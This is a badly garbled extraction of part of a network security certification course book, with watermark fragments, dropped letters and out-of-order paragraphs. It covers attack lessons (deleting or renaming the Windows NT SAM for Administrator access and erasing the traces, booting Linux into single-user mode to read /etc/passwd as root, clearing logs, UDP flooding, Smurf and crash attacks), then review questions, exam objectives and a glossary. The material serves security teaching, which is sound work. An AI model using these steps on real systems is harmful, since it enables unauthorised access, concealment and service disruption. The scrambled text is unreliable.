If you need access to the system and the SAM has disappeared, the new SAM might be a good idea. However, if a malicious attacker knows about this design feature and can get physical access to the server (such as with NTFSDOS on a oppy disk), he or she could use this knowledge to his or her advantage and purposely delete the SAM, in order to gain access to the system as Administrator! Because all non-default user accounts and passwords have disappeared from the server, the proper administrators of this computer should become aware of the problem fairly quickly and take steps to correct the problem. Although the attack was successful, all the alarms should now be blaring loudly, and going back is not an option. You may be asking, what else can be done with this technique? Similar to simply deleting the SAM, but even more effective, is to rename the SAM. If an attacker is able to gain physical access to the server, as described earlier, renames the SAM and the event (.evt) and log (.log) les, and reboots the server, he or she will be able to access an otherwise secure server. Once the exploitation is com-
The Security Accounts Manager is responsible for maintaining all of the user names, passwords, and account properties for the machine. When a machine is freshly installed, by default it has two accounts: Guest and Administrator. As the administrator adds new users and sets passwords for the users, the information is stored in the SAM le. This is all ne until something goes wrong. What happens if the SAM cannot be found when the system boots up? The Microsoft designers thought of this, and if this situation ever occurs, the system will just create a new SAM database with the default values (Guest and Administrator, with null passwords). Good news! The server is saved, right? Well, sort of.
DU
PL
IC
AT
Using L0pht may work in many given situations; however, the attacker may not have access to this program, or one like it. If this is the case, and the attacker needs to gain access to a Windows NT computer, one last possible attempt is to delete the SAM. The reason this would be considered a last attempt is it will be found quickly. This section shows how an operating system that is designed to be secure might be compromised with physical access and another operating system.
Ed
At the time of this writing, the latest Service Pack for Windows NT 4.0 was SP 6a.
iti
on
pleted, if the attacker deletes the new SAM, event, and log les, restores the original (renamed) SAM, event, and log les, and reboots the server, the attack can be completed without leaving a trace of evidence that the machine was compromised. In addition, the original Administrator account is not modied in any fashion.
GRUB
For default Linux installs, there is an even easier way to gain access to the root account if you have physical access to the system. This access method is built into the operating system in the form of the GRUB Loader.
TASK 8M-1
Ed
DU PL IC T
In Linux, if the attacker has local access to the computer, the job of securing the computer is much more difficult. One option the attacker may use is to simply boot to a different mode. Booting into Single User mode tells the operating system to boot into a mode where networking is disabled, software drivers are not enabled, and is designed for administrators to work on the OS itself. The console is still available though, and a user who is logged on in Single User mode has root access.
Investigating the Single User GRUB Loader
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. 2. 3. 4. 5. 6. 7. 8. Restart your computer.
ru ct
When you are prompted to choose an operating system, highlight Red Hat Linux, but do not press Enter. Type e then select the line that starts with kernel, and type e again. Press Spacebar and enter single to specify single-user mode.
or
DO NO
AT
If students choose Red Hat Linux instead of just selecting it, they will need to restart the computer and try again.
When you are returned to the screen with kernel highlighted, type b to boot the OS. Linux starts in single-user mode. Enter ls -l /root and cat /etc/passwd to test the access you have in singleuser mode. Browse to other directories on the hard drive. In single-user mode, you have root access, even though you did not log in as root.
In
Enter shutdown -r now to reboot the computer. Log on to Windows 2000 as the renamed Administrator account.
st
E
537
iti
on
Single User mode is used to recover the operating system from system crashes, or to regain root access in the event that the root password has been changed or forgotten.
Topic 8N
Hiding Evidence of an Attack
Clearing Log and Event Files
Hiding Attack Files
or
DO NO
Topic 8O
Performing a Denial of Service
ru ct In
The concept is similar to standing on a balcony during a press conference. Imagine being surrounded by 300 people, and 290 of them are just shouting out the word Padding! while the other 10 people are trying to ask legitimate questions. Do you think you would be able to properly respond to the 10 legitimate questions asked of you? Do you think you would even know that the questions were being asked? A common technique for performing a DoS is Smurf. Smurf is a tool that takes a different approach to the normal DoS routine. DoS would normally use default pings to overwhelm a given host. To really take up the resources a given target wants to use, the attacker would have to compromise many computers, and have them all ping the target at once. The difference that Smurf provides is to be able to launch a DoS against a target with only a single computer. Smurf works by sending a ping packet to the broadcast address of a network, with a spoofed source IP address. The source IP address is the actual target. When the network clients respond to the ping packet, they will all be sending a reply to the spoofed address. The number of hosts involved in this attack is limited to the number of hosts that are active on the network.
st
DU
Up to this point, the tools you have been using identify possible holes in the security of a system and the vulnerabilities of hosts. If the goal is not to gain access to a host, but to only disrupt access, then Denial of Service is required. By ooding the target, it becomes useless on the network.
PL
IC
AT
Another way that attackers can clean up after themselves is by hiding the les that they placed on the system. For instance, think back to the example of WandaB. To cover her tracks, she could change the properties of regedit.bat so that the le is hidden. Or, she could also rename the le to hide it from the real administrators.
Ed
iti
The two common areas that an attacker will work with to hide the evidence of an attack are the log les and the audit policies. Clearing the audit les will hide much of the evidence of the attack; however, the fact that the logs are cleared should raise red ags to even inexperienced administrators. The event log does not clear itself every now and then!
on
Generally, once an attacker has been in a system, it is important that the attacker not leave any traces of the attack. Although it is close to impossible to not leave any trace at all, it is possible to make it hard to locate the attacker, or evidence of the attack.
DoS attacks can run via multiple protocols, such as UDP and IP. Having the option to use multiple protocols increases the chance of getting past the rewall and being undetected by the Intrusion Detection System.
Flooding with Udpflood
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. 2. 3. 4. 5. 6. 7. Copy udpood.exe from the location provided by your instructor to the root of your C drive. Unzip the le if it is zipped.
Open a Command Prompt, switch to the C drive, and enter udpood to open the udpood utility. To target a machine, enter its IP address into the Destination eld, and use a well-known port of your choice, such as 80. Set Max Duration to 360 seconds and Max Packets to 999999.
Set Speed to 250 packets/second by sliding the bar all the way to the right. Click Go when you are ready to start the ood. Observe the lights on the hubs/switches in class. If you want to have a bigger impact on a machine, have several machines target the same host and then try to transfer a le to or from that target to another machine. If you are unable to complete this step, you will have performed a small-scale Distributed Denial of Service.
Ed
T DU PL IC
8.
Close all open windows, and shut down the computer.
OOB Exploit
st
In
DO
If a temporary DoS caused by a ood is not enough of a disruption to the attacker, that attacker might try to cause a target to reboot or otherwise crash. If that were the intent, the attack would now fall into the category of the Out Of Bounds (OOB) attack. You can cause an unpatched Windows system to hang (show the blue screen) by sending it a packet that is malformed in such a way that the TCP/IP stack of the machine doesnt know how to react, so it responds by giving us one of the much feared BSODs (Blue Screens of Death).
ru ct
NO
or
AT
E
539
iti
on
Provide students with the location of the udpood.exe le.
TASK 8O-1
Summary
We identied common social engineering techniques, and identied common issues regarding Trojan Horse, virus, and worm programs. Finally, we took a look into some basic programming techniques.
Lesson Review
8A Describe some of the methods that an attacker can use to identify information about a potential target.
Responses might include newsgroup postings, email headers, Web sites, merger news, and Whois lookups.
ru ct st In
Why would an attacker perform stack ngerprinting on an IP address?
In addition to being able to determine which hosts are active on the target network and what ports they have open and listening, what else can nmap identify by matching TCP/IP signatures? The operating system running on the host.
DO
To identify the operating system type and version that is running on the target. If these are identied, then the attacker can focus on specic exploits for that system.
NO
The SYN scan does not complete the connection between the two nodes, while the full connect scan completes the three-way handshake. The full connect is more likely to be caught by any Intrusion Detection Systems present on the network.
DU
8D What is the primary difference between a SYN scan and a full connect scan?
PL
To identify the active hosts. These active hosts may then become the targets of the attacker.
IC
8C What is the primary reason for sweeping a network?
or
AT
The internal network conguration, including router names, router congurations, and Web and email server locations.
8B What could a potential attacker learn by tracing a network?
Ed
iti
on
In this lesson, you looked at the general methodologies that a hacker might use to attack a target host. We detailed the concept of network reconnaissance and other means of gaining information about a potential target. We also investigated the issues surrounding network scanning, network sweeping, and port scanning, by using different tools and operating systems.
8E Which is more of a threat to a network: a virus, a Trojan Horse, or a worm?

It can be argued that all three are the highest threat. The virus may consume resources, such as DoS on the email system. The worm can be dangerous, since it can self-replicate through the network. The Trojan Horse can be a high threat in that if written cleverly, many people may execute it and spread it through the network. So, there is no one correct answer to this question, and if you identied this point, you are right!
8F How many ordinary, non-savvy users a day could a Web site such as Malweb trick into installing something other than a font?
8G True or False? Netcat can be used as a cross platform tool.

True.
Ed
T DU PL IC
Surprisingly, many! In this topic, you performed a task that an ordinary user in a typical corporate environment is tricked into doing almost on a daily basis. The connection is initiated by the user. Malicious Web sites are a major source of concern, as rewalls are typically congured to allow the user to initiate a connection to the Internet and not vice versa. If the user then downloads malicious programs in the form of spyware embedded in ads, games, or even so called helpful similar software, then the users machine can be compromised.
Because they are completely independent of the operating system.
8I
What le in Windows NT stores the current list of user names and passwords?
What le in Linux stores the current list of user names and passwords? etc/passwd and etc/shadow are both correct answers.
8J What is the weakness exploited by tools such as Snadboy?
8K What is a networks primary defense against social engineering?
st
Education of the users of a network is the only true defense against social engineering. Each user should be instructed on how to respond to situations similar to those described in this topic. Social engineering is one of the toughest issues a network needs to defend itself against.
8L Why are Trojan Horse programs often small, simple games?

By using a simple game, the attacker can ensure the game will circulate the offce quickly. If the game were hard or large, it would not work via email and not spread as quickly. The simple games are used specically because they are simple.
In
DO
NO
The characters as typed are echoed on screen by a maskSnadboy simply reveals what is under the mask.
ru ct
The SAM.
or
AT
8H Why are hardware keyboard loggers more dangerous than software loggers?
E
541
iti
on
8M What Windows NT le, if deleted or renamed, would grant access to the operating system with administrative privileges?
The SAM le.
The log les and the audit policies.
8O How does Smurf perform a DoS?
Smurf spoofs the source IP address with that of the intended targets IP address. Thus, all replies to ping would be directed to the target.
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
8N What are the two common areas an attacker will work with to hide his or her tracks?
Exam Objectives
Introduction
The Hardening the Infrastructure exam is designed to validate the foundation skills that a security professional requires. These skills include, but are not limited to, Router Security, Operating System Security, Advanced Knowledge of the TCP suite, and Network Security Basics.
Ed
T DU PL IC
The Hardening the Infrastructure exam has 6 Domains. The percentages of each domain in the exam are dened in the following chart: Examination Domain
1.0Contingency Planning 2.0Tools and Techniques 3.0Security on the Internet and the WWW 4.0Router Security and ACLs 5.0TCP/IP Packet Structure and Security 6.0Operating System Security Total
Percentage of Exam
st
Note:Important: All percentages are approximate and subject to change at any time. The Hardening the Infrastructure exam will be updated every year to ensure that candidates knowledge remains current and updated. In the event that signicant changes are to be made at the yearly update, the Security Certied Program Web site will announce those modications.
Mapping Exam Objectives to Course Content

The following table lists the test domains and objectives for the Hardening the Infrastructure examination, and where they are covered in this course.
In
DO
ru ct
NO
5 9 11 15 25 35 100
or
Appendix A: Hardening the Infrastructure Exam Objectives
AT
Domains and Percentages
E
543
iti
on
Hardening the Infrastructure Exam Objectives
APPENDIX
HTI Test Domains and Objectives

Domain 1.0: Contingency Planning (5%) 1.1. Fundamental Contingency Planning Identify the Need for Contingency Planning Describe Environmental and Technological Disasters Examine the Impact of the Plan on Business 1.2. Creation of the Contingency Plan Requirements of the Plan Goals of the Plan Testing the Plan 1.3. Technologies of Power Personal UPS Devices Server Room UPS Devices Full Building Generators 1.4. Backing up the Operating System Backup Strategies Backing up Windows Systems Backing up Linux Systems Domain 2.0: Tools and Techniques (9%) 2.1. Perform Network Scanning and Discovery Methods Network Reconnaissance
New Horizons Course Lessons and Topics

Lesson 6, Topic A
Lesson 6, Topic B
Ed
or
T NO DO
ru ct st
Telephone Social Engineering Physical Social Engineering 2.4. Describe Privilege Escalation Basic Programming Techniques
DU
Virus Trojan Horse Worm 2.3: Examine Social Engineering techniques Email Social Engineering
In
Gain Unauthorized Access 2.5. Examine the process of Keystroke Logging Hardware Keystroke Logging Software Keystroke Logging 2.6. Examine the Concepts of DoS Denial of Service Distributed Denial of Service
PL
IC
Network Scanning Network Mapping 2.2. Describe Virii, Trojans, and Worms
Network Scanning: Lesson 8, Topic D Network Mapping: Lesson 8, Topic B Lesson 8, Topic E
Lesson 8, Topics K and L
Lesson 8, Topic M
Lesson 8, Topic H
Lesson 7, Topic C; Lesson 8, Topic O
AT
Network Reconnaissance: Lesson 8, Topic A
iti
Lesson 6, Topic C Lesson 6, Topic D
on

2.7. Exploiting Password Weaknesses Strong Password Design Weak Password Design Password Cracking Techniques

Strong Password Design: Lesson 4, Topics B and C Weak Password Design: Lesson 4, Topics B and C Password Cracking Techniques: Lesson 8, Topics I and J
Routers
Denial of Service 3.2. Dene Web Site Attack Techniques Poor Programming Buffer Overows Vulnerability Scanning IIS Vulnerabilities
Lesson 7, Topic C
Ed
T DU PL IC
Domain 3.0: Security on the Internet and the WWW (11%) 3.1. Identify and Dene the Weak Points in the Structure of the Internet Tier System DNS ISPs NAPs
Lesson 7, Topics A and B
Cookie Misuse 3.4. Hardening Internet Access Points Internet Explorer Browser Settings IIS patching and Hot Fixing Apache Fundamental Security Settings Securing Email Clients Securing DNS Transfers
st
Domain 4.0: Router Security (15%) 4.1. Implementation of Fundamental Cisco Router Security Cisco Authentication and Authorization Implementation of Passwords Implementation of Banners Conguration of SSH Verication of SSH
Lesson 5, Topic A
In
DO
ru ct

Apache Vulnerabilities 3.3. Dene Attack Techniques of Web Users Email Attacks Scripting Vulnerabilities File Attachments
Securing Email Clients: Lesson 7, Topic D Securing DNS Transfers: Lesson 7, Topic B
NO
or
Lesson 7, Topic D
Internet Explorer Browser Settings: Lesson 7, Topic D IIS patching and Hot Fixing: Lesson 7, Topic C Apache Fundamental Security Settings: Lesson 7, Topic C
AT
E
545
iti
on

4.2. Describe the Routing Process Describe the ARP Process Describe the LAN to LAN Routing Process Describe the LAN to WAN Routing Process Examine Routing Protocols 4.3. Removing Unwanted Protocols and Services Describe What Services to Remove Congure the Removal of Unneeded Protocols Congure the Removal of Unneeded Services 4.4. Creation and Implementation of Access Control Lists Describe the Cisco ACL process Create Wildcard Masks Implement Standard ACLs Implement Extended ACLs Implement ACLs to defend against attacks

Lesson 5, Topic B
Lesson 5, Topic C
Ed

ru ct

Describe Multi, Broad, and Uni-Casting Examine Packet Capture and Analysis Tools Analyze packet Fragmentation
DU
Congure Buffered Logging Congure Antispoong Logging Domain 5.0: TCP/IP Packet Structure and Security (25 %) 5.1. Examine the Core Concepts of TCP/IP Create a VLSM Identify Protocols and their Corresponding OSI Layer
or
NO DO
In
5.2. Identify and Describe Packet Headers Describe the Structure of a Packet Identify and Describe the IP Header Identify and Describe the ICMP Header Identify and Describe the TCP Header Identify and Describe the UDP Header
st
546
PL

IC
Create a VLSM: Lesson 1, Topic A Identify Protocols and their Corresponding OSI Layer: Lesson 1, Topic A Describe Multi, Broad, and UniCasting: Lesson 1, Topic A Examine Packet Capture and Analysis Tools: Lesson 1, Topic B Analyze packet Fragmentation: Lesson 1, Topic G Describe the Structure of a Packet: Lesson 1, Topics C, D, E, and F Identify and Describe the IP Header: Lesson 1, Topic C Identify and Describe the ICMP Header: Lesson 1, Topic D Identify and Describe the TCP Header: Lesson 1, Topic E Identify and Describe the UDP Header: Lesson 1, Topic F
AT
4.5. Conguring Cisco Router Logging Describe Logging Options on a Cisco Router
iti

Implement ACLs to defend against attacks: Lesson 5, Topic E Lesson 5, Topic F
on
Describe the Cisco ACL process: Lesson 5, Topic D Create Wildcard Masks: Lesson 5, Topic D Implement Standard ACLs: Lesson 5, Topic E Implement Extended ACLs: Lesson 5, Topic E

5.3. Examine the Session Setup and Teardown Describe the TCP Lifecycle Identify the Concepts of the Three-Way Handshake Describe the Session Establishment Process Describe the Session Teardown Process

Describe the TCP Lifecycle: Lesson 1, Topic B Identify the concepts of the Three-Way Handshake: Lesson 1, Topic B Describe the Session Establishment Process: Lesson 1, Topic B Describe the Session Teardown Process: Lesson 1, Topics B and H Lesson 1, Topic I
Lesson 4, Topic A
ru ct

st
Implement Windows 2000 Registry Security Implement Windows 2000 Printer Security Manage Services and SubSystems Implement EFS
Implement Windows 2000 Registry Security: Lesson 4, Topic D Implement Windows 2000 Printer Security: Lesson 4, Topic D Manage Services and SubSystems: Lesson 4, Topic D
6.5. Windows 2000 Auditing and Logging Enable Auditing in Windows 2000 Manage Event Logs Security-related Event IDs Audit Authentication Access
In
Implement EFS: Lesson 4, Topic F Lesson 4, Topic E
DO
NO
Implementing Security Templates Creation of Security Templates Using Secedit.exe 6.4. Congure Windows 2000 Resource Security File and Folder Permissions in Windows 2000
File and Folder Permissions in Windows 2000: Lesson 4, Topic D
DU
Describe Group Policy Creation of a GPO 6.2. Examine Windows 2000 Authentication Describe LM Authentication Describe NTLM Authentication Describe and Congure NTLMv2 Authentication Describe Kerberos in Windows 2000 6.3. Implement Windows 2000 Security Conguration Tools Securing the Administrator Account Conguring the Security Conguration and Analysis Tool
or
Lesson 4, Topic C
PL
IC
AT
E
547
Lesson 4, Topic B
Ed
5.4. Identify and Implement IPv6 Describe Benets of IPv6 over IPv4 Identify IPv6 Addressing Schemes Implementation of IPv6 on a Windows client Conguration and Use of IPv6 Utilities Domain 6.0: Operating System Security (35%) 6.1. Windows 2000 Infrastructure Security Describe Active Directory Components
iti
on

6.6. Windows 2000 Network Security Examine NAT and Internet Connection Sharing Describe the Routing and Remote Access Service Examine the Internet Authentication Services Implement a RADIUS system 6.7. Fundamental Linux Security Congure File Permissions Congure Directory Permissions Managing the Password File Managing the Shadow Password File 6.8. Securing SAMBA Conguring SAMBA Key Files Conguring the SAMBA Server Conguring the SAMBA Client Securing the SAMBA Connections 6.9. Network Conguration Security Conguring NFS Servers Conguring NFS Clients Securing NFS Conguring NIS Securing NIS 6.10. Securing Linux

Lesson 4, Topic G
Lesson 3, Topic B
Ed

or
DO NO T
ru ct
In
st
DU
Implement and Congure Bastille
PL
Remove Unused Services Implement and Congure TCPWrappers Implement and Congure Tripwire Auditing and Logging on Linux
Remove Unused Services: Lesson 3, Topic E Implement and Congure TCPWrappers: Lesson 3, Topic C Implement and Congure Tripwire: Lesson 3, Topic E Auditing and Logging on Linux: Lesson 3, Topic E Implement and Congure Bastille: Lesson 3, Topic E
IC
AT
iti
Lesson 3, Topic D Lesson 3, Topic D
on
GLOSSARY
Administrative Security The management constraints and supplemental controls established to provide an acceptable level of protection for dened resources. AIS (Automated Information System) Any equipment of an interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, control, display, transmission, or reception of data and includes software, rmware, and hardware. alert A formatted message describing a circumstance relevant to network security. Alerts are often derived from critical audit events. ankle-biter A person who aspires to be a hacker/ cracker but has very limited knowledge or skills related to AISs. Usually associated with young teens who collect and use simple malicious programs obtained from the Internet. Anomaly Detection Model A model where intrusions are detected by looking for activity that is different from the users or systems normal behavior. assessment An analysis of the vulnerabilities of an AIS. Information acquisition and review process designed to assist a customer to determine how best to use resources to protect information in systems. assurance A measure of condence that the security features and architecture of an AIS accurately mediate and enforce the security policy.
or
DO NO
ru ct
st
Application Level Gateway (Firewall) A rewall system in which service is provided by processes that maintain complete TCP connection state and sequencing. Application level rewalls often readdress traffic so that outgoing trafc appears to have originated from the rewall, rather than the internal host. ASIM (Automated Security Incident Measurement) Monitors network traffic and collects information on targeted unit networks by detecting unauthorized network activity.
audit trail In computer security systems, a chronological record of system resource usage. This includes user login, le access, other various activities, and whether any actual or attempted security violations occurred. authenticate To establish the validity of a claimed user or object. authentication To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.
In
DU
audit The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.
PL
IC
AT
Glossary 549
attack An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.
Ed
iti
on
GLOSSARY
Authentication Header A eld that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram. Automated Security Monitoring All security features needed to provide an acceptable level of protection for hardware, software, and classied, sensitive, unclassied, or critical data, material, or processes. availability Assuring information and communications services will be ready for use when expected. back door A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls. buffer overflow This happens when more data is put into a buffer or holding area than the buffer can handle. This is due to a mismatch in processing rates between the producing and consuming processes. This can result in system crashes or the creation of a back door leading to system access. bug An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction. C2 Command and Control. C2-attack Prevent effective C2 of adversary forces by denying information to, inuencing, degrading, or destroying the data systems. C2-protect Maintain effective command and control of own forces by turning to friendly advantage or negating adversary effort to deny information to, inuence, degrade, or destroy the friendly C2 system. (Pending approval in JP 1-02.) C2W Command and Control Warfare. The integrated use of operations security, military deception, psychological operations, electronic warfare, and physical destruction, mutually supported by intelligence, to deny information to, inuence, degrade, or destroy adversary command and control capabilities, while protecting friendly command and control capabilities against such actions. Command and control warfare is an application of information operations in military operations and is a subset of information warfare. CGI (Common Gateway Interface) CGI is the method that Web servers use to allow interaction between servers and clients.
Ed
T DU
or
DO NO
550
In
st
ru ct
Bell-La Padula Security Model Formal-state transition model of computer security policy that describes a formal set of access controls based on information sensitivity and subject authorizations.
Biba Integrity Model A formal security model for the integrity of subjects and objects in a system. bomb A general synonym for crash, normally of software or operating system failures.
breach The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.
PL
IC
AT
iti
on
GLOSSARY
CGI scripts Allows for the creation of dynamic and interactive Web pages. They also tend to be the most vulnerable part of a Web server (besides the underlying host security). Check_Password A hacking program used for cracking VMS passwords. Chernobyl Packet Also called Kamikaze Packet. A network packet that induces a broadcast storm and network meltdown. Typically an IP Ethernet datagram that passes through a gateway with both source and destination Ethernet and IP address set as the respective broadcast addresses for the subnetworks being identical. Circuit Level Gateway One form of a rewall. Validates TCP and UDP sessions before opening a connection. Creates a handshake and, once that takes place, passes everything through until the session is terminated. compromise An intrusion into a computer system where unauthorized disclosure, modication, or destruction of sensitive information may have occurred.
computer fraud Misrepresentation or alteration of data in order to obtain something of value. Computer Network Attack Operations to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves. (DODD S-3600.1 of 9 Dec 1996) computer security Technological and managerial procedures applied to computer systems to ensure the availability, integrity, and condentiality of information managed by the computer. computer security incident Any intrusion or attempted intrusion into an automated information system (AIS). Incidents can include probes of multiple computer systems. computer security intrusion Any event of unauthorized access or penetration to an automated information system (AIS). confidentiality Assuring information will be kept secret, with access limited to appropriate persons.
Ed
T DU
computer abuse The willful or negligent unauthorized activity that affects the availability, condentiality, or integrity of computer resources. Computer abuse includes fraud, embezzlement, theft, malicious damage, unauthorized use, denial of service, and misappropriation.
or
DO NO
Clipper chip A tamper-resistant VLSI chip designed by NSA for encrypting voice communications. It conforms to the Escrow Encryption Standard (EES) and implements the Skipjack encryption algorithm. COAST (Computer Operations, Audit, and Security Technology) A multiple project, multiple investigator laboratory in computer security research in the Computer Sciences Department at Purdue University. It functions with close ties to researchers and engineers in major companies and government agencies. Its research is focused on realworld needs and limitations, with a special focus on security for legacy.
In
st
ru ct
PL
IC
AT
Glossary 551
iti
on
GLOSSARY
COPS (Computer Oracle and Password System) A computer network monitoring system for UNIX machines. Software tool for checking security on shell scripts and C programs. Checks for security weaknesses and provides warnings. COTS software (Commercial Off the Shelf Software) Acquired by government contract through a commercial vendor. This software is a standard product, not developed by a vendor for a particular government project. countermeasures Action, device, procedure, technique, or other measure that reduces the vulnerability of an automated information system. Countermeasures that are aimed at specic threats and vulnerabilities involve more sophisticated techniques as well as activities traditionally perceived as security. Crack A popular hacking tool used to decode encrypted passwords. System administrators also use Crack to assess weak passwords by novice users in order to enhance the security of the AIS. cracker One who breaks security on an AIS. cracking The act of breaking into a computer system. cryptanalysis Denition 1: The analysis of a cryptographic system and/or its inputs and outputs to derive condential variables and/or sensitive data including cleartext. Denition 2: Operations performed in converting encrypted messages to plaintext without initial knowledge of the cryptoalgorithm and/or key employed in the encryption. cryptographic hash function A process that computes a value (referred to as a hashword) from a particular data unit in a manner that, when a hashword is protected, manipulation of the data is difficult to attain. cryptography The art of science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.
Ed
T DU
or
NO DO
ru ct st
cyberspace Describes the world of connected computers and the society that gathers around them. Commonly known as the Internet. dark-side hacker A criminal or malicious hacker. DARPA Defense Advanced Research Projects Agency. data driven attack A form of attack that is encoded in seemingly innocuous data which is executed by a user or a process to implement an attack. A data driven attack is a concern for rewalls, since it may get through the rewall in data form and launch an attack against a system behind the rewall.
crash A sudden, usually drastic failure of a computer system.
In
PL
cryptology The science which deals with hidden, disguised, or encrypted communications.
IC
AT
iti
on
GLOSSARY
defensive information operations A process that integrates and coordinates policies and procedures, operations, personnel, and technology to protect information and defend information systems. Defensive information operations are conducted through information assurance, physical security, operations security, counterdeception, counter-psychological operations, counter-intelligence, electronic protect, and special information operations. Defensive information operations ensure timely, accurate, and relevant information access while denying adversaries the opportunity to exploit friendly information and information systems for their own purposes. demon dialer A program which repeatedly calls the same telephone number. This is benign and legitimate for access to a BBS but malicious when used as a denial of service attack. Denial of Service Action(s) which prevent any part of an AIS from functioning in accordance with its intended purpose. derf The act of exploiting a terminal which someone else has absent-mindedly left logged on. DII (Defense Information Infrastructure) The shared or interconnected system of computers, communications, data applications, security, people, training, and other support structures serving DoD local, national, and worldwide information needs. DII connects DoD mission support, command and control, and intelligence computers through voice, telecommunications, imagery, video, and multimedia services. It provides information processing and services to the subscribers over the Defense Information Systems Network and includes command and control, tactical, intelligence, and commercial communications systems used to transmit DoD information. (Pending)
Ed
T DU
or
DO NO
DES (Data Encryption Standard) Denition 1: An unclassied crypto algorithm adopted by the National Bureau of Standards for public use. Denition 2: A cryptographic algorithm for the protection of unclassied data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.
In
st
ru ct
DNS spoofing Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain. EA (Electronic Attack) A division of EW involving the use of electromagnetic, directed energy, or antiradiation weapons to attack personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying enemy combat capability. EA includes actions taken to prevent or reduce an enemys effective use of the electromagnetic spectrum, such as jamming and electromagnetic deception and employment of weapons that use either electromagnetic or directed energy as their primary destructive mechanism.
PL
IC
DMZ (Demilitarized Zone) A part of the network that is neither part of the internal network nor directly part of the Internet. Basically a network sitting between two networks.
AT
Glossary 553
iti
on
GLOSSARY
EP (Electronic Protection) A division of EW involving actions taken to protect personnel, facilities, and equipment from any effects of friendly or enemy employment of EW that degrade, neutralize, or destroy friendly combat capability. ES (Electronic Warfare Support) A division of EW involving actions tasked by, or under direct control of, an operational commander to search for, intercept, identify, and locate sources of intentional and unintentional radiated electromagnetic energy for the purpose of immediate threat recognition. Thus, electronic warfare support provides information required for immediate decisions involving EW operations and other tactical actions such as threat avoidance, targeting, and homing. ES data can be used to produce signals intelligence. ESP (Encapsulating Security Payload) A mechanism to provide condentiality and integrity protection to IP datagrams. false negative Occurs when an actual intrusive action has occurred but the system allows it to pass as non-intrusive behavior. false positive Occurs when the system classies an action as anomalous (a possible intrusion) when it is a legitimate action. fault tolerance The ability of a system or component to continue normal operation despite the presence of hardware or software faults. firewall A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical rewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster. fishbowl To contain, isolate, and monitor an unauthorized user within a system in order to gain information about the user. Fork Bomb Also known as Logic Bomb. Code that can be written in one line of code on any UNIX system, used to recursively spawn copies of itself. Eventually explodes, eating all the process table entries and effectively locking up the system. hacker A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.
Ed
T DU
or
DO NO
554
In
st
ru ct
Ethernet sniffing Listening with software to the Ethernet interface for packets that interest the user. When the software sees a packet that ts certain criteria, it logs it to a le. The most common criteria for an interesting packet is one that contains words like login or password. EW (Electronic Warfare) Any military action involving the use of electromagnetic and directed energy to control the electromagnetic spectrum or to attack the enemy. The three major subdivisions within electronic warfare are electronic attack, electronic protection, and electronic warfare support.
PL
IC
AT
iti
on
GLOSSARY
hacking Unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network. hacking run A hack session extended long outside normal working times, especially one longer than 12 hours. host A single computer or workstation; it can be connected to a network. host based Information, such as audit data from a single host which may be used to detect intrusions. IA (Information Assurance) Information Operations that protect and defend information and information systems by ensuring their availability, integrity, authentication, condentiality, and non-repudiation. This includes providing for restoration of information systems by incorporating protection, detection, and reaction capabilities. (DODD S-3600.1 of 9 Dec 1996) IDEA (International Data Encryption Algorithm) A private key encryption-decryption algorithm that uses a key that is twice the length of a DES key. information superiority The capability to collect, process, and disseminate an uninterrupted ow of information while exploiting or denying an adversarys ability to do the same. (DODD S-3600.1 of 9 Dec 1996) integrity Assuring information will not be accidentally or maliciously altered or destroyed.
or
DO NO
ru ct
st
IDIOT (Intrusion Detection In Our Time) A system that detects intrusions using patternmatching. information security The result of any system of policies and/or procedures for identifying, controlling, and protecting from unauthorized disclosure, information whose protection is authorized by executive order or statute.
IO (Information Operations) Actions taken to affect adversary information and information systems while defending ones own information and information systems. (DODD S-3600.1 of 9 Dec 96) IP splicing/hijacking An action whereby an active, established session is intercepted and co-opted by the unauthorized user. IP splicing attacks may occur after an authentication has been made, permitting the attacker to assume the role of an already authorized user. Primary protections against IP splicing rely on encryption at the session or network layer.
In
DU
intrusion detection Pertaining to techniques which attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts either manually or via software expert systems that operate on logs or other information available.
PL
IC
AT
Glossary 555
intrusion Any set of actions that attempts to compromise the integrity, condentiality, or availability of a resource.
Ed
Internet worm A worm program (see: worm) that was unleashed on the Internet in 1988. It was written by Robert T. Morris as an experiment that got out of hand.
iti
on
GLOSSARY
